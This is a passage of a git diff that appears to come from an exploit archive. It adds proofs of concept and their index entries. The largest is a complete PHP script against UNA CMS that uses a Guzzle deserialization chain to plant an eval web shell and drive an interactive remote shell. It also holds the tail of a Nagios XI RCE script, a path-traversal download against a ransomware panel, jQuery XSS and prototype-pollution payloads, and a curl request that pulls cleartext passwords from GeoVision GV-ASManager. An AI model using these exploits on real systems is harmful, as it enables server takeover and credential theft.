+    parser.add_argument('-lh', metavar='<Listener IP>', help="Example: -lh 127.0.0.1", required=True)
+    parser.add_argument('-lp', metavar='<Listener Port>', help="Example: -lp 1337", required=True)
+    parser.add_argument('-k', action='store_true', help="Ignore SSL certificate verification")
+    args = parser.parse_args()
+
+
+    urllib3.disable_warnings()
+
+    try:
+        print('CVE-2019-15949 Nagiosxi authenticated Remote Code Execution')
+        Nagiosxi(args.t, args.b, args.u, args.p, args.lh, args.lp, args.k)
+    except KeyboardInterrupt:
+        print("\nBye Bye!")
+        exit()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52139.txt b/exploits/multiple/webapps/52139.txt
new file mode 100644
index 000000000..53e3b8140
--- /dev/null
+++ b/exploits/multiple/webapps/52139.txt
@@ -0,0 +1,125 @@
+# Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
+# Author: Egidio Romano aka EgiX
+# Software link.......: https://unacms.com
+
+
+[-] Software Links:
+https://unacms.com
+https://github.com/unacms/una
+
+[-] Affected Versions:
+All versions from 9.0.0-RC1 to 14.0.0-RC4.
+
+[-] Vulnerability Description:
+The vulnerability is located in the
+/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
+within the BxBaseMenuSetAclLevel::getCode() method. When calling this
+method, user input passed through the "profile_id" POST parameter is
+not properly sanitized before being used in a call to the
+unserialize() PHP function. This can be exploited by remote,
+unauthenticated attackers to inject arbitrary PHP objects into the
+application scope, allowing them to perform a variety of attacks, such
+as writing and executing arbitrary PHP code.
+
+<?php
+
+/*
+    ------------------------------------------------------------------------------------
+    UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
+    ------------------------------------------------------------------------------------
+
+    author..............: Egidio Romano aka EgiX
+    mail................: n0b0d13s[at]gmail[dot]com
+    software link.......: https://unacms.com
+
+    +-------------------------------------------------------------------------+
+    | This proof of concept code was written for educational purpose only.    |
+    | Use it at your own risk. Author will be not responsible for any damage. |
+    +-------------------------------------------------------------------------+
+
+    [-] Vulnerability Description:
+
+    The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
+    Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
+    method, user input passed through the "profile_id" POST parameter is not properly
+    sanitized before being used in a call to the unserialize() PHP function. This can be
+    exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
+    the application scope, allowing them to perform a variety of attacks, such as
+    writing and executing arbitrary PHP code.
+
+    [-] Original Advisory:
+
+    https://karmainsecurity.com/KIS-2025-01
+*/
+
+set_time_limit(0);
+error_reporting(E_ERROR);
+
+print "\n+------------------------------------------------------------+";
+print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
+print "\n+------------------------------------------------------------+\n";
+
+if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
+
+if ($argc != 2)
+{
+	print "\nUsage......: php $argv[0] <URL>\n";
+	print "\nExample....: php $argv[0] http://localhost/una/";
+	print "\nExample....: php $argv[0] https://unacms.com/\n\n";
+	die();
+}
+
+define('ON_APACHE', true);
+define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');
+
+class GuzzleHttp_Cookie_SetCookie
+{
+	private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
+}
+
+class GuzzleHttp_Cookie_FileCookieJar
+{
+	private $cookies, $filename = SH_PATH, $storeSessionCookies = true;
+
+	function __construct()
+	{
+		$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
+	}
+}
+
+$url = $argv[1];
+$ch  = curl_init();
+
+$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
+$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
+$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);
+
+curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
+curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));
+
+print "\n[+] Performing PHP Object Injection";
+
+curl_exec($ch); curl_close($ch);
+
+print "\n[+] Launching shell\n";
+
+$ch = curl_init();
+
+curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+
+$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";
+
+while(1)
+{
+	print "\nuna-shell# ";
+	if (($cmd = trim(fgets(STDIN))) == "exit") break;
+	curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
+	preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52140.txt b/exploits/multiple/webapps/52140.txt
new file mode 100644
index 000000000..02a8ae36d
--- /dev/null
+++ b/exploits/multiple/webapps/52140.txt
@@ -0,0 +1,71 @@
+# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
+# Google Dork: N/A
+# Date: 22-03-2025
+# Exploit Author: bRpsd cy[at]live.no
+# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
+# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
+# Version: N/A
+# Tested on: MacOS local xampp
+
+
+Authentication can be easily bypassed due to SQL Injection as mentioned in:
+https://www.exploit-db.com/exploits/52091
+
+
+
+Vulnerable file:Web Panel/download_file.php
+Vulnerable parameter:file
+Vulnerable code:
+<?php
+session_start();
+if(!isset($_SESSION['username']) ){
+	header("Location: login.php");
+}
+$file=$_GET['file'];
+if(!empty($file)){
+    // Define headers
+    header("Cache-Control: public");
+    header("Content-Description: File Transfer");
+    header("Content-Disposition: attachment; filename=$file");
+    header("Content-Type: text/encoded");
+    header("Content-Transfer-Encoding: binary");
+
+    // Read the file
+   readfile($file);
+    exit;
+}else{
+    echo 'The file does not exist.';
+}
+?>
+
+
+Proof of concept:
+
+http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br, zstd
+Connection: keep-alive
+Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+
+GET: HTTP/1.1 200 OK
+Date: Sat, 22 Mar 2025 09:42:09 GMT
+Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
+X-Powered-By: PHP/7.4.29
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: public
+Pragma: no-cache
+Content-Description: File Transfer
+Content-Disposition: attachment; filename=database/db_conection.php
+Content-Transfer-Encoding: binary
+Content-Length: 95
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/encoded;charset=UTF-8
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52141.txt b/exploits/multiple/webapps/52141.txt
new file mode 100644
index 000000000..dcdc08051
--- /dev/null
+++ b/exploits/multiple/webapps/52141.txt
@@ -0,0 +1,72 @@
+# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
+# Google Dork: N/A
+# Date: 2025-02-13
+# Exploit Author: xOryus
+# Vendor Homepage: https://jquery.com
+# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
+# Version: 3.3.1
+# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
+# CVE : CVE-2019-11358, CVE-2020-7656
+# Category: WebApps
+
+# Description:
+# This exploit abuses two vulnerabilities in jQuery:
+# - CVE-2020-7656: XSS via improper script handling
+# - CVE-2019-11358: Prototype Pollution leading to XSS
+# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
+#
+# Usage:
+# 1. Load this script in a page that includes jQuery 3.3.1
+# 2. Observe two XSS alerts via script injection and prototype pollution.
+
+# PoC (Proof of Concept):
+# ------------------------------------
+
+/*
+ * Exploit for CVE-2020-7656 and CVE-2019-11358
+ * Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
+ */
+
+COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)
+
+// 1. Load vulnerable jQuery (version 3.3.1)
+const script = document.createElement('script');
+script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
+document.head.appendChild(script);
+
+// 2. Function to execute after jQuery is loaded
+script.onload = function() {
+    console.log("[+] Vulnerable jQuery loaded!");
+
+    // 3. Inject malicious content for XSS (CVE-2020-7656)
+    const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
+    $('body').append(maliciousContent);
+    console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");
+
+    // 4. Exploit Prototype Pollution (CVE-2019-11358)
+    const defaultConfig = {
+        "backLink": "<a href='https://example.com'>Go Back</a>"
+    };
+
+    const maliciousParams = {
+        "__proto__": {
+            "backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
+        }
+    };
+
+    // 5. Merge objects using vulnerable $.extend
+    let config = $.extend(true, defaultConfig, maliciousParams);
+    console.log("[+] Prototype Pollution executed via $.extend().");
+
+    // 6. Create a container to inject malicious content
+    const container = document.createElement('div');
+    container.id = 'backLinkContainer';
+    document.body.appendChild(container);
+
+    // 7. Inject malicious content into the DOM
+    $('#backLinkContainer').html(config.backLink);
+    console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
+};
+
+// 8. Instruction message
+console.log("[*] Script injected. Waiting for jQuery to load...");
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52144.txt b/exploits/multiple/webapps/52144.txt
new file mode 100644
index 000000000..661e864f4
--- /dev/null
+++ b/exploits/multiple/webapps/52144.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Information Disclosure in GeoVision GV-ASManager
+# Google Dork: inurl:"ASWeb/Login"
+# Date: 02-FEB-2025
+# Exploit Author: Giorgi Dograshvili [DRAGOWN]
+# Vendor Homepage: https://www.geovision.com.tw/
+# Software Link: https://www.geovision.com.tw/download/product/
+# Version: 6.1.0.0 or less
+# Tested on: Windows 10 | Kali Linux
+# CVE : CVE-2024-56902
+# PoC: https://github.com/DRAGOWN/CVE-2024-56902
+
+
+Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
+
+Requirements
+To perform successful attack an attacker requires:
+- GeoVision ASManager version 6.1.0.0 or less
+- Network access to the GV-ASManager web application (there are cases when there are public access)
+- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)
+
+Impact
+The vulnerability can be leveraged to perform the following unauthorized actions:
+A low privilege account is able to:
+- Enumerate user accounts
+- Retrieve cleartext password of any account in GV-ASManager.
+After reusing the retrieved password, an attacker will be able to:
+- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
+- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
+- Disrupt and disconnect services such as monitoring cameras, access controls.
+- Clone and duplicate access control data for further attack scenarios.
+- Reusing retrieved password in other digital assets of the organization.
+
+cURL script:
+
+curl --path-as-is -i -s -k -X $'POST' \
+    -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
+   -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
+    --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
+    $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
+
+
+After a successful attack, you will get access to:
+- ASWeb	- Access & Security Management
+- TAWeb	- Time and Attendance Management
+- VMWeb	- Visitor Management
+- ASManager - Access & Security Management software in OS
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9245b6df5..047d7616f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11031,6 +11031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,remote,multiple,,2011-05-09,2015-01-08,1,,,,,,https://www.securityfocus.com/bid/47780/info
 39455,exploits/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,remote,multiple,,2016-02-18,2016-02-18,0,CVE-2015-2080,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
 46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,,2019-02-11,2019-02-12,0,CVE-2019-6545;CVE-2019-6543,,,,,
+52142,exploits/multiple/remote/52142.py,"InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation",2025-04-08,"Andrea Pasin",remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-30896,,,,,
 30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple,,2008-01-02,2014-01-16,1,CVE-2008-6060;OSVDB-56437,,,,,https://www.securityfocus.com/bid/27109/info
 21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,,2002-10-15,2012-10-13,1,CVE-2002-1910;OSVDB-59780,,,,,https://www.securityfocus.com/bid/5970/info
 20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88577,,,,,https://www.securityfocus.com/bid/2062/info
@@ -11486,6 +11487,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
 24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
 21453,exploits/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",remote,multiple,,2002-05-17,2012-09-22,1,CVE-2002-2341;OSVDB-4408,,,,,https://www.securityfocus.com/bid/4755/info
+52143,exploits/multiple/remote/52143.py,"Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)",2025-04-08,lkushinada,remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-23922,,,,,
 22509,exploits/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",remote,multiple,,2012-11-05,2012-11-05,1,OSVDB-87063;OSVDB-87062;OSVDB-87061;OSVDB-87060;OSVDB-87059;OSVDB-87058;OSVDB-87057;OSVDB-87056,,,,,
 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,,2020-06-15,2020-06-15,0,CVE-2020-12712,,,,,
 50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",2022-06-14,Altelus,remote,multiple,,2022-06-14,2022-06-14,0,CVE-2022-23642,,,,,
@@ -11926,6 +11928,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
 37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
+52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0  - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
 47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
 49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
@@ -11997,6 +12000,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,,2021-01-06,2021-01-06,0,CVE-2021-3018,,,,,
 50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,multiple,,2021-11-03,2021-11-03,0,,,,,,
 52062,exploits/multiple/webapps/52062.py,"Ivanti vADC 9.9 - Authentication Bypass",2024-08-04,ohnoisploited,webapps,multiple,,2024-08-04,2024-08-04,0,,,,,,
+52140,exploits/multiple/webapps/52140.txt,"Jasmin Ransomware - Arbitrary File Download (Authenticated)",2025-04-08,bRpsd,webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
 44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,,2018-05-15,2018-05-15,0,CVE-2018-5430,,,,,https://rhinosecuritylabs.com/application-security/authenticated-file-read-vulnerability-in-jasperreports/
 36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple,,2015-04-13,2015-04-13,0,OSVDB-120064,,,,,
 35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117568;OSVDB-117567;CVE-2015-1478;CVE-2015-1477,,,,,
@@ -12018,6 +12022,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48147,exploits/multiple/webapps/48147.txt,"Joplin Desktop 1.0.184 - Cross-Site Scripting",2020-03-02,"Javier Olmedo",webapps,multiple,,2020-03-02,2020-03-02,0,CVE-2020-9038,,,,,
 49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11023,,,,,
 49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11022,,,,,
+52141,exploits/multiple/webapps/52141.txt,"jQuery 3.3.1 - Prototype Pollution & XSS Exploit",2025-04-08,xOryus,webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2020-7656;CVE-2019-11358,,,,,
 11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,webapps,multiple,,2010-01-20,,1,,,,,http://www.exploit-db.comjquery.uploadify-v2.1.0.zip,
 38641,exploits/multiple/webapps/38641.rb,"JSSE - SKIP-TLS",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2014-6593;OSVDB-117238,,,,,
 38424,exploits/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,webapps,multiple,,2015-10-11,2015-10-11,0,CVE-2015-5285,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
@@ -12112,6 +12117,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
 49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
 52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
+52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
 51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
 41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
 41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Scripting (XSS)",,,,
@@ -12359,6 +12365,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7171,,,,http://www.exploit-db.comTwonkyServer-8.5.exe,
 44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7203,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comTwonkyServer-8.5.exe,
 47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
+52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
 49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
 47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
 43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,CVE-2017-17672,,,,,https://blogs.securiteam.com/index.php/archives/3573
@@ -12414,6 +12421,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - File Upload (Metasploit)",2016-05-04,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2016-1209;OSVDB-8485,,,,,https://github.com/rapid7/metasploit-framework/blob/8cd9a9b6708c4a175d5175879169188dc8014a51/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb
 49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
 33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info
+52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
 37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info
 40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
 40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php